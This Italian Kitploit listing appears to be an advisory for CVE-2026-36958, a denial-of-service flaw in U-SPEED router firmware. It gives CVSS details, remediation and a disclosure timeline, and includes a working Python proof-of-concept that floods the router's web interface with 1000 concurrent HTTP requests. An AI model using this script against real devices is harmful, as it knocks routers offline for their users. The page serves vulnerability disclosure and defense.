Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-36958 — Proof-of-concept per CVE-2026-36958, una vulnerabilità denial-of-service nel firmware del router U-SPEED che esaurisce le risorse tramite richieste HTTP concorrenti, rendendo l'interfaccia web non reattiva. | Kitploit
Strumenti/GitHubGitHub/kirubel-cve/cve-2026-36958
Analisi delle VulnerabilitàExploitSicurezza WebSicurezza di RetePenetration Testing
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

Proof-of-concept per CVE-2026-36958, una vulnerabilità denial-of-service nel firmware del router U-SPEED che esaurisce le risorse tramite richieste HTTP concorrenti, rendendo l'interfaccia web non reattiva.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-36958: Denial of Service tramite Richieste HTTP Concorrenti

CVE ID: CVE-2026-36958 Data: 2026-04-29 Scopritore: Kirubel Solomne Vendor: U-SPEED Prodotto: Router U-SPEED Versione Firmware: V1.0.0 CWE: CWE-400 - Consumo di Risorse Non Controllato


Descrizione

Il firmware V1.0.0 del Router U-SPEED è vulnerabile a Denial of Service. Inviando un gran numero di richieste HTTP concorrenti a endpoint casuali o inesistenti sull'interfaccia di gestione web, un attaccante può esaurire le risorse di sistema nel server HTTP Boa integrato. Ciò rende l'interfaccia web del router non reattiva e potrebbe richiedere un riavvio manuale per ripristinare il normale funzionamento.


Punteggio CVSS

Punteggio CVSS v3.1: 7.5 (Alto) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MetricaValore
Vettore di AttaccoRete
Complessità dell'AttaccoBassa
Privilegi RichiestiNessuno
Interazione dell'UtenteNessuna
Impatto sulla RiservatezzaNessuno
Impatto sull'IntegritàNessuno
Impatto sulla DisponibilitàAlto

Prova di Concetto

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

Comportamento Atteso: Il server dovrebbe gestire le connessioni concorrenti in modo elegante. Comportamento Effettivo: L'interfaccia web diventa non reattiva; è richiesto un riavvio manuale.


Impatto

  • L'interfaccia di gestione web diventa non disponibile
  • Potenziale interruzione dei servizi di routing
  • Richiede un riavvio manuale per ripristinare la funzionalità

Rimedio

  • Implementare la limitazione della velocità delle connessioni sul server web Boa
  • Limitare il numero massimo di connessioni concorrenti per IP sorgente
  • Aggiungere un meccanismo automatico di ripristino/watchdog

Cronologia della Divulgazione

DataEvento
2026-04-29Vulnerabilità scoperta
2026-04-29Segnalata a MITRE
2026-04-29CVE-2026-36958 assegnato
2026-04-29Divulgazione pubblica

Riferimenti

  • MITRE CVE-2026-36958
  • CWE-400
  • Sito Web del Vendor
Scarica lo strumento